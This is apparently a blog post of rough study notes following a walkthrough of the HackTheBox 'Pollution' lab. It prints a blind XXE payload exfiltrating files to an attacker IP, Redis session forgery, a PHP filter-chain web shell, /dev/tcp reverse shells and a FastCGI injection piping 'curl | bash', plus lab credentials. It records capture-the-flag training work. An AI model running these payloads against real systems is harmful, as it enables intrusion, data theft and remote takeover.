hackthebox pollution insane

start of namp 

 it's bannber tells us it's apache also running debian and more importatntly we get a php session cookie id back so chances are this is going to be a php website

let's go take a look at the page 

roll to the deep and we find that is a collect.htb so we have a potential hostname 

add it over to the hostfile

before spend too much time poking at  the it ,we need to running the gobuster 

cracking directory 

gobuster -u http://10.10.11.192 -w /opt/Seclist/discovery/web-content/raft-small-words.txt -o root.gobuster 

and we get the first error,it's trying to do a request to this uuid this changes  every time and it's getting a 302 redirect and we find that once we enter the wrong second directory the website will redirect to the index page. we need to use -b to avoid these 404 and 302 respone code 

gobuster -u http://10.10.11.192/ -w /opt/seclist/discovery/web-content/raft-smll-words.txt -o root.gobuster -b 404,302

while that goes let's examine other feartures of this site and go over to the register functionality  and let's try registering ippsec with the password  -- success

logging to the website 

most the information is similar ,we can see a pollution api is showing on the website --find the API

this is one different from index page 

as we know that this page have one api and we can take a look at the js code or page source code finding this api 

so the next step is hit this api 

go back to gobuster and check the directory 

 also start gobuster to crack the vhost of this box 

gobuster vhost -u http://collect.htb -w /opt/seclist/discovery/DNS/subdomains-topmillion-5000.txt and we get a hit for a forum.collect.htb

go over it to the hosts file and visit this web 

we get a message board and this looks like it is my bb  an open source message board .we probably try to find out the version of it but we do have threads and post to read 

 so let's click the form to see if there's anything interesting 

and we find that one file call proxy_history.txt is allowed to be download and give a look

when we access it ,it wants me to log in so lets register an account and use it log in.

downloading proxy_history and we get this burpsite file

copy is and put it in a text file 

scroll down and see the base64 text .

echo -n xx | base64 -d to show origin text 

it looks like the headers to the request

look back to the burpsuite file and respone text is under the label <response length> </responselength>

we find that is a label of url 

we can grep the url and take a look the url inside this burpsuite req and res

grep  url proxy_history.txt 

we can see this http://collect.htb/set/role/admin and http://127.0.0.1:3000/auth/login 

maybe there is a local web server on this box 

let's search for collect.htb and look at the request text 

decode the base64 text  a

echo -n xxx | base64 -d 

token=ddac62a28254561001277727cb397baf

maybe this token is the password to be able to set/role/admin.

lets recreate this request set/role/admin we're going to see if we can make ourselves an admin

1.go back to home page 2.access http://collect.htb/set/role/admin 3.make the reqeust

change the method of it  ,add the token ,send this post request and we get the 302 code but redirect to /admin page 

and we go to slash admin what's redirecting us ,we can see a direrent platform

lets just try the username and password which was resgiterd to log in and intercept this request 

tips:the most important step for login page is intercept this login request and look at this package whether have vital message in it

it's going to the api so we finally hit the API of pollution 

the problem is we can't get any data back  so we can't just have this include a file 

we need to make the sever make a request back to us,so let's google  hacktricks xxe 

 we can use "blind" SSRF -exfiltrate data out-of-band

according to the exp step,improve each of them

1. touch www directory and vi external.dtd copy the payload below in it 

modify some parameter like  SYSTEM 'http://10.10.14.8:8000/

it hitting %exfiltrate triggers the system function and file is /etc/hostname 

2.python -m http.server 8000 

open a webserver 

3.copy one standard xxe injection payload and  paste it in request package 

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://10.10.14.8/external.dtd"> %xxe; ]>

4.send the request 

 it doesn't show up our hostname message (ERROR-1)

solution 

maybe the hostname require us have some type of bad character,let's do a php convert 

tips:penetration thought-- we can change different coding to show the text .(if one coding is bad,we can use phpbase64 function or other)

modify the DTD file funciton <!ENTITY % SYSTEM php://filter/convert.base64-encode/resource=/etc/hostname">

we can do this because the application itself is  a php so if we make this base64 then it's going to be a lot more friendly  to the url 

resend the request (success)

look at the python log 

we accquire a get request and show us a piece of base64 coding ,decode it and show pollution

but we need to get some susceptible message 

modify reading file is /etc/passwd but we find that there is not any base64 coding but a original external.dtd file

the reason why we don't get anything from passwd is the file is too big .there is too many character in it and too long for url  and error is out. so we can go for other file.

trying /etc/hosts file  (find out whether have other subdomain we don't have)

we get back the content of hosts file by base64 encoding,decode it and find new host --developers.collect.htb

use script to easily get the interaction for the message of xxe injection 

download script from https://github.com/ippsec/ctf-scripts/xxe/bind-xxe.py

just copy the whole burp request to a file and use -r to send it 

xxe.req file

use script easliy get the message back 

python xxe.py -r xxe.req  # and enter the susceptible file

we can't get /etc/passwd because the length there is a php wrapper we could have zipped it up first 

but we can first collect other message 

1.get the apache conf file to check config 

first is default file we can't get back 

we do get a virtual host

also trying every domain we get 

we get a virtual host as well

it show that authuserfiel is at /vat/www/developers/.htpasswd 

we can access develop.collect.htb because this domain we find in victim /etc/hosts

it show up a login box and  it meas we need to have a username ,password 

we can use xxe.py look at the /var/www/developers/.htpasswd 

we accquire a pair of username and password 

utiliz hashcat crack this password 

hashcat hashfile /opt/xxx/rockyou.txt (success)

so the username is developers_group the password is r0cket

login to the developers.collect.htb 

get to another username  and password 

we don't have this user and passwd ,we can try week password or username but fail

use xxe lfi to get the /var/www/developer/index.php to check the code 

it show that if we don't have the correct authentication we will redirect to login.php 

use xxe lfi copy login.php source code out and look at it (fail) 

use xxe lif copy bootstrap.php source code out and give a look(success)

so there is a redis server open at port 6379 and tell us auth is COLLECTR3D1SPASS ,we could try to login 

redis login 

redis-cli -h collect.htb 

collect.htb:6379> AUTH COLLECTR3D1SPASS 

where we did the xml injection,there is a PHPSESSID  cookit that begins with tkng

so if we use redis-cli get this cookie it's very similar to like a php serialized object where we have a username variable 

introduction username is string type having  6 character. role is string type having 5 charater

this login.php website probably is multiple users that also use redis accout 

we user f12 to see our cookie as a visitor and we find that cookie begins with d79fr

back to redis-cli and get the message from d79fr etc. (get the key it's blank)

set this cookie for a new accout,because we only satisfy one condition we can login 

so set the auth eq 1

set PHPREDIS_SESSION:d79fr.....lop3 'auth|b:1;' or 'auth|s:5:"admin";' 

visit http://developers.collect.htb/index.php (succes) it redirect to http://xx/?page=home  

so cause it is a php website,we can use php://filter/convet.base64-encode/resource to get the file source code back with base64 coding

construt exp for retrieving the source code of login page with base64 coding 

exp: http://developers.collect.htb/?page=php:/filter/conver.base64-encode/resouce=login

we get a output ,decode it.

tips: the base64 docoder say that these code are invalid. --we can also copy them from view-source page 

decode them again ,we have login.php source code.at the meantime we get mysql login username and password

maybe there is not only lif loophole but also a gadget chain with php filter to put anything we want tin this 

access ippsec.rocks and search for php filter code ( it show that we can use gadget chain with php filter to get a RCE)

 visit github and search php_filter_chain_generator 

git url : https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py

create a php rce exp for php filter RCE 

python3 php_filter_chain_generator.py --chain <?php system($_REQUEST['cmd']);?>   > exp.txt  

and copy to burp request package 

at last we add cmd to execute code  (fail)

the reason why it can't execute curl cmd is we don't add the cmd parameter at lost 

add a cmd key at last as a parameter and resend (success)

send a reverse shell cmd 

cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.8:9001 0>&1' (ctrl u to url encode this cmd)

we get a shell

shell interactly improve

python -c 'import pty;pty.spawn("/bin/bash")' to improve #but echo as the command

solution

1.ctrl Z to stop control the shell 

2.stty raw -echo;fg 

  •   stty raw -echo -- set the terminal in raw mode which is disabing echoing means that the characters typed by the user will not be displayed on the screen.
  •   fg -- this command braings a suspended job to the foreground.ti's typically after suspending a preocess(ctrl Z) to resume its execution in the foreground.

3.export TERM=xterm 

now we get a great interact shell

look at the open port

ss -pntl

utiliz grep cmd to sift file have 3000 and 9000

we find a /etc/php/8.1/fpm/pool.d/www.conf file is listening, cat it to see what it is 

this file have many ';' character ,we use grep -v '^;'and grep '.' to sift the valid statement 

we see that victor have the fpm process at the port 9000

since we can access 127.0.0.1 9000,we can inject php code into this project and get a shell as victor

we can google 'hacktrick fpm php' 

the pricipal of this RCE

this understanding may not be correct

this whole pool manage workds by like apache sending it the php code for it to execute and what we are going to abuse is we can talk to the same socket that apache is and by giving apache this bash file we can prepend other code to it and we are going to prepend our payload 

use python script is more easily to execute 

create a file at /tmp and past the python script in it

 python xx.py to see the grammer

python3 fcgi.py <?php system("bash -c \"bash -i > & -- when we want to enter to input it turn the cursor to the begining of the cmd

get a interatly shell (when we enter and automatically turning the cursor to begining of sentence)

1.stty -a 

2.get to the box shell 

stty rows 31 colums 121

use fastcgi.py to pretend a php code to the box localhost file 

1.at the kali,we create a index.html with code bash -c 'bash -i >& /dev/tcp/10.10.14.8:9001 0>&1'  and start a http server by python at port 8000

2.nc -lvnp 9001 at kali

3.python fcgi.py -c '<? php system("curl 10.10.14.8:8000 | bash");' localhost  /var/www/developers/index.php

  introduce: this exp is tell the fastcgi to pretend the php code to the /var/www/developers/index.php file and the vital step is  curl the kali's http server file to revese the bash to attacker

we get a shell by user victor

go to the /home/victor directory to look up whether have susceptible file 

also create a ssh authentication file for easily connect

ssh-keygen to create a authentication file 

ssh-keygen -f victor
enter enter 

 create a key

create a pub file and victor key file 

kali : python -m http.server 8080 to open a port for victim machine to curl this key file to .ssh/authorized_keys

victor 's shell :

   1.curl http://10.10.14.8/victor.pub -o authorized_keys #this key file is typically attention to the privacy,must chmod 600 to this file 

   2.chmod 600 autho*

use ssh key file and dash i parameter to login ssh with certs

ssh -i victor victor@10.10.11.192 (success)

we still don't know what the service running on port 3000,at the meantime this shell is user shell not the root shell(need to escalate privilege),we can also look at something wether there have a running process is started by root

using ps -ef to search for root running process 

we notice that this 1356 process is running by root and use node cmd to execute /root/pollution_api/index.js .we can utiliz this js file to escalate privilege.

cat the js file  and notice this file is listen on 3000

tar the pollution_pai directory and use scp to send this file to our kali's local

(victim)tar cmd : tar -cjvf pollution_api.tar.bz2 pollution_api

(kali)scp cmd : scp -i victor victor@10.10.11.192:/pollution_api.tar.bz3 . 

https://www.zolaboo.com/blog/3FHuatma5fw6M9fvCLeJq3/ 

posted @ 2023-07-24 22:41  lisenMiller  阅读(43)  评论(0编辑  收藏  举报